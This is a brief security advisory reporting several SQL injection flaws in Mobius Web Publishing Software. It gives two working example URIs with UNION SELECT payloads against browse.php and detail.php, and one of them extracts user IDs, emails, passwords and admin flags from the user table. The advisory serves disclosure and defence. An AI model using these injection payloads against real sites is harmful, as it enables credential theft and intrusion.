Mobius Web Publishing Software Multiple SQL Injection Vulnerabilities

Mobius Web Publishing Software Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/browse.php?id=-1+UNION+SELECT+concat_ws(char(58),USID,EMAIL,SUPERSECRETPASSWORD,ADMIN)+from+Webusers+limit+0,1/*
http://www.example.com/detail.php?t=exhibitions&type=exh&f=&s=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*